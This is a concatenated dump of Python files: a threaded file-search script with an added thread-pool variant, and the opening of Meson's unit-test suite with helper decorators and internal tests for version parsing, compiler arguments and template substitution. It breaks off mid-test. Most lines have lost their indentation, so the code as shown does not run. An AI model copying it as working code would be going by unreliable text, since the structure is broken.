any([process.is_alive() for process in processes]) and not self.should_exit
):
time.sleep(0.1)
logger.info("Stopping parent process [{}]".format(pid))
|
concurrent_file_search.py
|
import os
from os.path import isdir, join
from threading import Lock, Thread
mutex = Lock()
matches = []
def file_search(root, filename):
print("Searching in:", root)
child_threads = []
for file in os.listdir(root):
full_path = join(root, file)
if filename in file:
            with mutex:
                matches.append(full_path)
if isdir(full_path):
            t = Thread(target=file_search, args=(full_path, filename))
t.start()
child_threads.append(t)
for t in child_threads:
t.join()
def main():
t = Thread(target=file_search, args=(["c:/tools", "README.md"]))
t.start()
t.join()
for m in matches:
print("Matched:", m)
main()
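# --- Hedged alternative sketch, not part of the original script --------------
# file_search starts one thread per subdirectory, which is simple but can spawn
# a very large number of threads on deep trees. A bounded variant searches several
# roots concurrently with a small worker pool instead; search_many is a made-up
# helper shown only for illustration.
from concurrent.futures import ThreadPoolExecutor
def search_many(roots, filename, max_workers=4):
    def walk_one(root):
        return [join(dirpath, name)
                for dirpath, _subdirs, names in os.walk(root)
                for name in names if filename in name]
    found = []
    with ThreadPoolExecutor(max_workers=max_workers) as pool:
        for hits in pool.map(walk_one, roots):
            found.extend(hits)
    return found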
|
run_unittests.py
|
#!/usr/bin/env python3
# Copyright 2016-2017 The Meson development team
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
import stat
import subprocess
import re
import json
import tempfile
import textwrap
import os
import shutil
import sys
import unittest
import platform
import pickle
import functools
import io
import operator
import threading
import zipfile, tarfile
import hashlib
from itertools import chain
from unittest import mock
from configparser import ConfigParser
from contextlib import contextmanager
from glob import glob
from pathlib import (PurePath, Path)
from distutils.dir_util import copy_tree
import typing as T
import mesonbuild.mlog
import mesonbuild.depfile
import mesonbuild.dependencies.base
import mesonbuild.compilers
import mesonbuild.envconfig
import mesonbuild.environment
import mesonbuild.mesonlib
import mesonbuild.coredata
import mesonbuild.modules.gnome
from mesonbuild.interpreter import Interpreter, ObjectHolder
from mesonbuild.interpreterbase import typed_pos_args, InvalidArguments
from mesonbuild.ast import AstInterpreter
from mesonbuild.mesonlib import (
BuildDirLock, LibType, MachineChoice, PerMachine, Version, is_windows,
is_osx, is_cygwin, is_dragonflybsd, is_openbsd, is_haiku, is_sunos,
windows_proof_rmtree, python_command, version_compare, split_args,
quote_arg, relpath, is_linux, git
)
from mesonbuild.environment import detect_ninja
from mesonbuild.mesonlib import MesonException, EnvironmentException, OptionKey
from mesonbuild.dependencies import PkgConfigDependency, ExternalProgram
import mesonbuild.dependencies.base
from mesonbuild.build import Target, ConfigurationData
import mesonbuild.modules.pkgconfig
from mesonbuild.scripts import destdir_join
from mesonbuild.mtest import TAPParser, TestResult
from mesonbuild.wrap.wrap import PackageDefinition, WrapException
from run_tests import (
Backend, FakeBuild, FakeCompilerOptions,
ensure_backend_detects_changes, exe_suffix, get_backend_commands,
get_builddir_target_args, get_fake_env, get_fake_options, get_meson_script,
run_configure_inprocess, run_mtest_inprocess
)
if T.TYPE_CHECKING:
from mesonbuild.compilers import Compiler
URLOPEN_TIMEOUT = 5
@contextmanager
def chdir(path: str):
curdir = os.getcwd()
os.chdir(path)
try:
yield
finally:
os.chdir(curdir)
def get_dynamic_section_entry(fname: str, entry: str) -> T.Optional[str]:
if is_cygwin() or is_osx():
raise unittest.SkipTest('Test only applicable to ELF platforms')
try:
raw_out = subprocess.check_output(['readelf', '-d', fname],
universal_newlines=True)
except FileNotFoundError:
# FIXME: Try using depfixer.py:Elf() as a fallback
raise unittest.SkipTest('readelf not found')
pattern = re.compile(entry + r': \[(.*?)\]')
for line in raw_out.split('\n'):
m = pattern.search(line)
if m is not None:
return str(m.group(1))
return None # The file did not contain the specified entry.
def get_soname(fname: str) -> T.Optional[str]:
return get_dynamic_section_entry(fname, 'soname')
def get_rpath(fname: str) -> T.Optional[str]:
raw = get_dynamic_section_entry(fname, r'(?:rpath|runpath)')
# Get both '' and None here
if not raw:
return None
# nix/nixos adds a bunch of stuff to the rpath out of necessity that we
# don't check for, so clear those
final = ':'.join([e for e in raw.split(':') if not e.startswith('/nix')])
return final
def is_tarball():
if not os.path.isdir('docs'):
return True
return False
def is_ci():
if 'CI' in os.environ:
return True
return False
def _git_init(project_dir):
# If a user has git configuration init.defaultBranch set we want to override that
with tempfile.TemporaryDirectory() as d:
out = git(['--version'], str(d))[1]
if version_compare(mesonbuild.environment.search_version(out), '>= 2.28'):
extra_cmd = ['--initial-branch', 'master']
else:
extra_cmd = []
subprocess.check_call(['git', 'init'] + extra_cmd, cwd=project_dir, stdout=subprocess.DEVNULL)
subprocess.check_call(['git', 'config',
'user.name', 'Author Person'], cwd=project_dir)
subprocess.check_call(['git', 'config',
'user.email', 'teh_coderz@example.com'], cwd=project_dir)
_git_add_all(project_dir)
def _git_add_all(project_dir):
subprocess.check_call('git add *', cwd=project_dir, shell=True,
stdout=subprocess.DEVNULL)
subprocess.check_call(['git', 'commit', '-a', '-m', 'I am a project'], cwd=project_dir,
stdout=subprocess.DEVNULL)
@functools.lru_cache()
def is_real_gnu_compiler(path):
'''
Check if the gcc we have is a real gcc and not a macOS wrapper around clang
'''
if not path:
return False
out = subprocess.check_output([path, '--version'], universal_newlines=True, stderr=subprocess.STDOUT)
return 'Free Software Foundation' in out
def skipIfNoExecutable(exename):
'''
Skip this test if the given executable is not found.
'''
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
if shutil.which(exename) is None:
raise unittest.SkipTest(exename + ' not found')
return func(*args, **kwargs)
return wrapped
return wrapper
def skipIfNoPkgconfig(f):
'''
Skip this test if no pkg-config is found, unless we're on CI.
This allows users to run our test suite without having
pkg-config installed on, f.ex., macOS, while ensuring that our CI does not
silently skip the test because of misconfiguration.
Note: Yes, we provide pkg-config even while running Windows CI
'''
@functools.wraps(f)
def wrapped(*args, **kwargs):
if not is_ci() and shutil.which('pkg-config') is None:
raise unittest.SkipTest('pkg-config not found')
return f(*args, **kwargs)
return wrapped
def skipIfNoPkgconfigDep(depname):
'''
Skip this test if the given pkg-config dep is not found, unless we're on CI.
'''
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
if not is_ci() and shutil.which('pkg-config') is None:
raise unittest.SkipTest('pkg-config not found')
if not is_ci() and subprocess.call(['pkg-config', '--exists', depname]) != 0:
raise unittest.SkipTest('pkg-config dependency {} not found.'.format(depname))
return func(*args, **kwargs)
return wrapped
return wrapper
def skip_if_no_cmake(f):
'''
Skip this test if no cmake is found, unless we're on CI.
This allows users to run our test suite without having
cmake installed on, f.ex., macOS, while ensuring that our CI does not
silently skip the test because of misconfiguration.
'''
@functools.wraps(f)
def wrapped(*args, **kwargs):
if not is_ci() and shutil.which('cmake') is None:
raise unittest.SkipTest('cmake not found')
return f(*args, **kwargs)
return wrapped
def skip_if_not_language(lang):
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
try:
env = get_fake_env()
f = getattr(env, 'detect_{}_compiler'.format(lang))
f(MachineChoice.HOST)
except EnvironmentException:
raise unittest.SkipTest('No {} compiler found.'.format(lang))
return func(*args, **kwargs)
return wrapped
return wrapper
def skip_if_env_set(key):
'''
Skip a test if a particular env is set, except when running under CI
'''
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
old = None
if key in os.environ:
if not is_ci():
raise unittest.SkipTest('Env var {!r} set, skipping'.format(key))
old = os.environ.pop(key)
try:
return func(*args, **kwargs)
finally:
if old is not None:
os.environ[key] = old
return wrapped
return wrapper
def skip_if_not_base_option(feature):
"""Skip tests if The compiler does not support a given base option.
for example, ICC doesn't currently support b_sanitize.
"""
def actual(f):
@functools.wraps(f)
def wrapped(*args, **kwargs):
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
key = OptionKey(feature)
if key not in cc.base_options:
raise unittest.SkipTest(
'{} not available with {}'.format(feature, cc.id))
return f(*args, **kwargs)
return wrapped
return actual
@contextmanager
def temp_filename():
'''A context manager which provides a filename to an empty temporary file.
On exit the file will be deleted.
'''
fd, filename = tempfile.mkstemp()
os.close(fd)
try:
yield filename
finally:
try:
os.remove(filename)
except OSError:
pass
@contextmanager
def no_pkgconfig():
'''
A context manager that overrides shutil.which and ExternalProgram to force
them to return None for pkg-config to simulate it not existing.
'''
old_which = shutil.which
old_search = ExternalProgram._search
def new_search(self, name, search_dir):
if name == 'pkg-config':
return [None]
return old_search(self, name, search_dir)
def new_which(cmd, *kwargs):
if cmd == 'pkg-config':
return None
return old_which(cmd, *kwargs)
shutil.which = new_which
ExternalProgram._search = new_search
try:
yield
finally:
shutil.which = old_which
ExternalProgram._search = old_search
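# Illustrative usage of no_pkgconfig(), shown only as a hedged comment (the
# dependency name and assertion below are examples, not an actual test):
#     with no_pkgconfig():
#         dep = PkgConfigDependency('glib-2.0', get_fake_env(), {'required': False})
#         assert not dep.found()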
class InternalTests(unittest.TestCase):
def test_version_number(self):
searchfunc = mesonbuild.environment.search_version
self.assertEqual(searchfunc('foobar 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('1.2.3'), '1.2.3')
self.assertEqual(searchfunc('foobar 2016.10.28 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('2016.10.28 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('foobar 2016.10.128'), '2016.10.128')
self.assertEqual(searchfunc('2016.10.128'), '2016.10.128')
self.assertEqual(searchfunc('2016.10'), '2016.10')
self.assertEqual(searchfunc('2016.10 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('oops v1.2.3'), '1.2.3')
self.assertEqual(searchfunc('2016.oops 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('2016.x'), 'unknown version')
def test_mode_symbolic_to_bits(self):
modefunc = mesonbuild.mesonlib.FileMode.perms_s_to_bits
self.assertEqual(modefunc('---------'), 0)
self.assertEqual(modefunc('r--------'), stat.S_IRUSR)
self.assertEqual(modefunc('---r-----'), stat.S_IRGRP)
self.assertEqual(modefunc('------r--'), stat.S_IROTH)
self.assertEqual(modefunc('-w-------'), stat.S_IWUSR)
self.assertEqual(modefunc('----w----'), stat.S_IWGRP)
self.assertEqual(modefunc('-------w-'), stat.S_IWOTH)
self.assertEqual(modefunc('--x------'), stat.S_IXUSR)
self.assertEqual(modefunc('-----x---'), stat.S_IXGRP)
self.assertEqual(modefunc('--------x'), stat.S_IXOTH)
self.assertEqual(modefunc('--S------'), stat.S_ISUID)
self.assertEqual(modefunc('-----S---'), stat.S_ISGID)
self.assertEqual(modefunc('--------T'), stat.S_ISVTX)
self.assertEqual(modefunc('--s------'), stat.S_ISUID | stat.S_IXUSR)
self.assertEqual(modefunc('-----s---'), stat.S_ISGID | stat.S_IXGRP)
self.assertEqual(modefunc('--------t'), stat.S_ISVTX | stat.S_IXOTH)
self.assertEqual(modefunc('rwx------'), stat.S_IRWXU)
self.assertEqual(modefunc('---rwx---'), stat.S_IRWXG)
self.assertEqual(modefunc('------rwx'), stat.S_IRWXO)
# We could keep listing combinations exhaustively but that seems
# tedious and pointless. Just test a few more.
self.assertEqual(modefunc('rwxr-xr-x'),
stat.S_IRWXU |
stat.S_IRGRP | stat.S_IXGRP |
stat.S_IROTH | stat.S_IXOTH)
self.assertEqual(modefunc('rw-r--r--'),
stat.S_IRUSR | stat.S_IWUSR |
stat.S_IRGRP |
stat.S_IROTH)
self.assertEqual(modefunc('rwsr-x---'),
stat.S_IRWXU | stat.S_ISUID |
stat.S_IRGRP | stat.S_IXGRP)
def test_compiler_args_class_none_flush(self):
cc = mesonbuild.compilers.ClangCCompiler([], 'fake', MachineChoice.HOST, False, mock.Mock())
a = cc.compiler_args(['-I.'])
        # First, check that the tree construction deduplicates the correct -I argument
a += ['-I..']
a += ['-I./tests/']
a += ['-I./tests2/']
        # Think of this as an assertion; we cannot apply it, otherwise the CompilerArgs would already flush the changes:
# assertEqual(a, ['-I.', '-I./tests2/', '-I./tests/', '-I..', '-I.'])
a += ['-I.']
a += ['-I.', '-I./tests/']
self.assertEqual(a, ['-I.', '-I./tests/', '-I./tests2/', '-I..'])
        # Then check that, when the CompilerArgs already have a built container list, the deduplication picks the correct one
a += ['-I.', '-I./tests2/']
self.assertEqual(a, ['-I.', '-I./tests2/', '-I./tests/', '-I..'])
def test_compiler_args_class_d(self):
d = mesonbuild.compilers.DmdDCompiler([], 'fake', MachineChoice.HOST, 'info', 'arch')
# check include order is kept when deduplicating
a = d.compiler_args(['-Ifirst', '-Isecond', '-Ithird'])
a += ['-Ifirst']
self.assertEqual(a, ['-Ifirst', '-Isecond', '-Ithird'])
def test_compiler_args_class_clike(self):
cc = mesonbuild.compilers.ClangCCompiler([], 'fake', MachineChoice.HOST, False, mock.Mock())
# Test that empty initialization works
a = cc.compiler_args()
self.assertEqual(a, [])
# Test that list initialization works
a = cc.compiler_args(['-I.', '-I..'])
self.assertEqual(a, ['-I.', '-I..'])
# Test that there is no de-dup on initialization
self.assertEqual(cc.compiler_args(['-I.', '-I.']), ['-I.', '-I.'])
## Test that appending works
a.append('-I..')
self.assertEqual(a, ['-I..', '-I.'])
a.append('-O3')
self.assertEqual(a, ['-I..', '-I.', '-O3'])
## Test that in-place addition works
a += ['-O2', '-O2']
self.assertEqual(a, ['-I..', '-I.', '-O3', '-O2', '-O2'])
# Test that removal works
a.remove('-O2')
self.assertEqual(a, ['-I..', '-I.', '-O3', '-O2'])
# Test that de-dup happens on addition
a += ['-Ifoo', '-Ifoo']
self.assertEqual(a, ['-Ifoo', '-I..', '-I.', '-O3', '-O2'])
# .extend() is just +=, so we don't test it
## Test that addition works
# Test that adding a list with just one old arg works and yields the same array
a = a + ['-Ifoo']
self.assertEqual(a, ['-Ifoo', '-I..', '-I.', '-O3', '-O2'])
# Test that adding a list with one arg new and one old works
a = a + ['-Ifoo', '-Ibaz']
self.assertEqual(a, ['-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2'])
# Test that adding args that must be prepended and appended works
a = a + ['-Ibar', '-Wall']
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2', '-Wall'])
## Test that reflected addition works
# Test that adding to a list with just one old arg works and yields the same array
a = ['-Ifoo'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2', '-Wall'])
# Test that adding to a list with just one new arg that is not pre-pended works
a = ['-Werror'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Werror', '-O3', '-O2', '-Wall'])
# Test that adding to a list with two new args preserves the order
a = ['-Ldir', '-Lbah'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Ldir', '-Lbah', '-Werror', '-O3', '-O2', '-Wall'])
# Test that adding to a list with old args does nothing
a = ['-Ibar', '-Ibaz', '-Ifoo'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Ldir', '-Lbah', '-Werror', '-O3', '-O2', '-Wall'])
## Test that adding libraries works
l = cc.compiler_args(['-Lfoodir', '-lfoo'])
self.assertEqual(l, ['-Lfoodir', '-lfoo'])
# Adding a library and a libpath appends both correctly
l += ['-Lbardir', '-lbar']
self.assertEqual(l, ['-Lbardir', '-Lfoodir', '-lfoo', '-lbar'])
# Adding the same library again does nothing
l += ['-lbar']
self.assertEqual(l, ['-Lbardir', '-Lfoodir', '-lfoo', '-lbar'])
## Test that 'direct' append and extend works
l = cc.compiler_args(['-Lfoodir', '-lfoo'])
self.assertEqual(l, ['-Lfoodir', '-lfoo'])
# Direct-adding a library and a libpath appends both correctly
l.extend_direct(['-Lbardir', '-lbar'])
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar'])
# Direct-adding the same library again still adds it
l.append_direct('-lbar')
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar'])
# Direct-adding with absolute path deduplicates
l.append_direct('/libbaz.a')
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a'])
# Adding libbaz again does nothing
l.append_direct('/libbaz.a')
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a'])
def test_compiler_args_class_gnuld(self):
## Test --start/end-group
linker = mesonbuild.linkers.GnuBFDDynamicLinker([], MachineChoice.HOST, '-Wl,', [])
gcc = mesonbuild.compilers.GnuCCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock(), linker=linker)
## Ensure that the fake compiler is never called by overriding the relevant function
gcc.get_default_include_dirs = lambda: ['/usr/include', '/usr/share/include', '/usr/local/include']
## Test that 'direct' append and extend works
l = gcc.compiler_args(['-Lfoodir', '-lfoo'])
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group'])
# Direct-adding a library and a libpath appends both correctly
l.extend_direct(['-Lbardir', '-lbar'])
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-Wl,--end-group'])
# Direct-adding the same library again still adds it
l.append_direct('-lbar')
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '-Wl,--end-group'])
# Direct-adding with absolute path deduplicates
l.append_direct('/libbaz.a')
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group'])
# Adding libbaz again does nothing
l.append_direct('/libbaz.a')
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group'])
# Adding a non-library argument doesn't include it in the group
l += ['-Lfoo', '-Wl,--export-dynamic']
self.assertEqual(l.to_native(copy=True), ['-Lfoo', '-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group', '-Wl,--export-dynamic'])
# -Wl,-lfoo is detected as a library and gets added to the group
l.append('-Wl,-ldl')
self.assertEqual(l.to_native(copy=True), ['-Lfoo', '-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--export-dynamic', '-Wl,-ldl', '-Wl,--end-group'])
def test_compiler_args_remove_system(self):
## Test --start/end-group
linker = mesonbuild.linkers.GnuBFDDynamicLinker([], MachineChoice.HOST, '-Wl,', [])
gcc = mesonbuild.compilers.GnuCCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock(), linker=linker)
## Ensure that the fake compiler is never called by overriding the relevant function
gcc.get_default_include_dirs = lambda: ['/usr/include', '/usr/share/include', '/usr/local/include']
## Test that 'direct' append and extend works
l = gcc.compiler_args(['-Lfoodir', '-lfoo'])
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group'])
## Test that to_native removes all system includes
l += ['-isystem/usr/include', '-isystem=/usr/share/include', '-DSOMETHING_IMPORTANT=1', '-isystem', '/usr/local/include']
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group', '-DSOMETHING_IMPORTANT=1'])
def test_string_templates_substitution(self):
dictfunc = mesonbuild.mesonlib.get_filenames_templates_dict
substfunc = mesonbuild.mesonlib.substitute_values
ME = mesonbuild.mesonlib.MesonException
# Identity
self.assertEqual(dictfunc([], []), {})
# One input, no outputs
inputs = ['bar/foo.c.in']
outputs = []
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
'@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out'] + cmd[1:])
cmd = ['@INPUT0@.out', '@PLAINNAME@.ok', 'strings']
self.assertEqual(substfunc(cmd, d),
[inputs[0] + '.out'] + [d['@PLAINNAME@'] + '.ok'] + cmd[2:])
cmd = ['@INPUT@', '@BASENAME@.hah', 'strings']
self.assertEqual(substfunc(cmd, d),
inputs + [d['@BASENAME@'] + '.hah'] + cmd[2:])
cmd = ['@OUTPUT@']
self.assertRaises(ME, substfunc, cmd, d)
# One input, one output
inputs = ['bar/foo.c.in']
outputs = ['out.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
'@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c',
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': '.'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@INPUT@.out', '@OUTPUT@', 'strings']
self.assertEqual(substfunc(cmd, d),
[inputs[0] + '.out'] + outputs + cmd[2:])
cmd = ['@INPUT0@.out', '@PLAINNAME@.ok', '@OUTPUT0@']
self.assertEqual(substfunc(cmd, d),
[inputs[0] + '.out', d['@PLAINNAME@'] + '.ok'] + outputs)
cmd = ['@INPUT@', '@BASENAME@.hah', 'strings']
self.assertEqual(substfunc(cmd, d),
inputs + [d['@BASENAME@'] + '.hah'] + cmd[2:])
# One input, one output with a subdir
outputs = ['dir/out.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
'@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c',
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': 'dir'}
# Check dictionary
self.assertEqual(ret, d)
# Two inputs, no outputs
inputs = ['bar/foo.c.in', 'baz/foo.c.in']
outputs = []
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1]}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@INPUT@', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), inputs + cmd[1:])
cmd = ['@INPUT0@.out', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out'] + cmd[1:])
cmd = ['@INPUT0@.out', '@INPUT1@.ok', 'strings']
self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out', inputs[1] + '.ok'] + cmd[2:])
cmd = ['@INPUT0@', '@INPUT1@', 'strings']
self.assertEqual(substfunc(cmd, d), inputs + cmd[2:])
# Many inputs, can't use @INPUT@ like this
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough inputs
cmd = ['@INPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
        # @PLAINNAME@ and @BASENAME@ are not valid with multiple inputs
cmd = ['@PLAINNAME@']
self.assertRaises(ME, substfunc, cmd, d)
cmd = ['@BASENAME@']
self.assertRaises(ME, substfunc, cmd, d)
# No outputs
cmd = ['@OUTPUT@']
self.assertRaises(ME, substfunc, cmd, d)
cmd = ['@OUTPUT0@']
self.assertRaises(ME, substfunc, cmd, d)
cmd = ['@OUTDIR@']
self.assertRaises(ME, substfunc, cmd, d)
# Two inputs, one output
outputs = ['dir/out.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1],
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': 'dir'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@OUTPUT@', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), outputs + cmd[1:])
cmd = ['@OUTPUT@.out', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out'] + cmd[1:])
cmd = ['@OUTPUT0@.out', '@INPUT1@.ok', 'strings']
self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out', inputs[1] + '.ok'] + cmd[2:])
# Many inputs, can't use @INPUT@ like this
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough inputs
cmd = ['@INPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough outputs
cmd = ['@OUTPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Two inputs, two outputs
outputs = ['dir/out.c', 'dir/out2.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1],
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTPUT1@': outputs[1],
'@OUTDIR@': 'dir'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@OUTPUT@', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), outputs + cmd[1:])
cmd = ['@OUTPUT0@', '@OUTPUT1@', 'strings']
self.assertEqual(substfunc(cmd, d), outputs + cmd[2:])
cmd = ['@OUTPUT0@.out', '@INPUT1@.ok', '@OUTDIR@']
self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out', inputs[1] + '.ok', 'dir'])
# Many inputs, can't use @INPUT@ like this
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough inputs
cmd = ['@INPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough outputs
cmd = ['@OUTPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Many outputs, can't use @OUTPUT@ like this
cmd = ['@OUTPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
def test_needs_exe_wrapper_override(self):
config = ConfigParser()
config['binaries'] = {
'c': '\'/usr/bin/gcc\'',
}
config['host_machine'] = {
'system': '\'linux\'',
'cpu_family': '\'arm\'',
'cpu': '\'armv7\'',
'endian': '\'little\'',
}
        # Cannot be used as a context manager because we need to
        # open it a second time, and this is not possible on
        # Windows.
configfile = tempfile.NamedTemporaryFile(mode='w+', delete=False)
configfilename = configfile.name
config.write(configfile)
configfile.flush()
configfile.close()
opts = get_fake_options()
opts.cross_file = (configfilename,)
env = get_fake_env(opts=opts)
detected_value = env.need_exe_wrapper()
os.unlink(configfilename)
desired_value = not detected_value
config['properties'] = {
'needs_exe_wrapper': 'true' if desired_value else 'false'
}
configfile = tempfile.NamedTemporaryFile(mode='w+', delete=False)
configfilename = configfile.name
config.write(configfile)
configfile.close()
opts = get_fake_options()
opts.cross_file = (configfilename,)
env = get_fake_env(opts=opts)
forced_value = env.need_exe_wrapper()
os.unlink(configfilename)
self.assertEqual(forced_value, desired_value)
def test_listify(self):
listify = mesonbuild.mesonlib.listify
# Test sanity
self.assertEqual([1], listify(1))
self.assertEqual([], listify([]))
self.assertEqual([1], listify([1]))
# Test flattening
self.assertEqual([1, 2, 3], listify([1, [2, 3]]))
self.assertEqual([1, 2, 3], listify([1, [2, [3]]]))
self.assertEqual([1, [2, [3]]], listify([1, [2, [3]]], flatten=False))
# Test flattening and unholdering
holder1 = ObjectHolder(1)
self.assertEqual([holder1], listify(holder1))
self.assertEqual([holder1], listify([holder1]))
self.assertEqual([holder1, 2], listify([holder1, 2]))
self.assertEqual([holder1, 2, 3], listify([holder1, 2, [3]]))
def test_unholder(self):
unholder = mesonbuild.mesonlib.unholder
holder1 = ObjectHolder(1)
holder3 = ObjectHolder(3)
holders = [holder1, holder3]
self.assertEqual(1, unholder(holder1))
self.assertEqual([1], unholder([holder1]))
self.assertEqual([1, 3], unholder(holders))
def test_extract_as_list(self):
extract = mesonbuild.mesonlib.extract_as_list
# Test sanity
kwargs = {'sources': [1, 2, 3]}
self.assertEqual([1, 2, 3], extract(kwargs, 'sources'))
self.assertEqual(kwargs, {'sources': [1, 2, 3]})
self.assertEqual([1, 2, 3], extract(kwargs, 'sources', pop=True))
self.assertEqual(kwargs, {})
# Test unholding
holder3 = ObjectHolder(3)
kwargs = {'sources': [1, 2, holder3]}
self.assertEqual(kwargs, {'sources': [1, 2, holder3]})
# flatten nested lists
kwargs = {'sources': [1, [2, [3]]]}
self.assertEqual([1, 2, 3], extract(kwargs, 'sources'))
def test_pkgconfig_module(self):
dummystate = mock.Mock()
dummystate.subproject = 'dummy'
_mock = mock.Mock(spec=mesonbuild.dependencies.ExternalDependency)
_mock.pcdep = mock.Mock()
_mock.pcdep.name = "some_name"
_mock.version_reqs = []
_mock = mock.Mock(held_object=_mock)
# pkgconfig dependency as lib
deps = mesonbuild.modules.pkgconfig.DependenciesHelper(dummystate, "thislib")
deps.add_pub_libs([_mock])
self.assertEqual(deps.format_reqs(deps.pub_reqs), "some_name")
# pkgconfig dependency as requires
deps = mesonbuild.modules.pkgconfig.DependenciesHelper(dummystate, "thislib")
deps.add_pub_reqs([_mock])
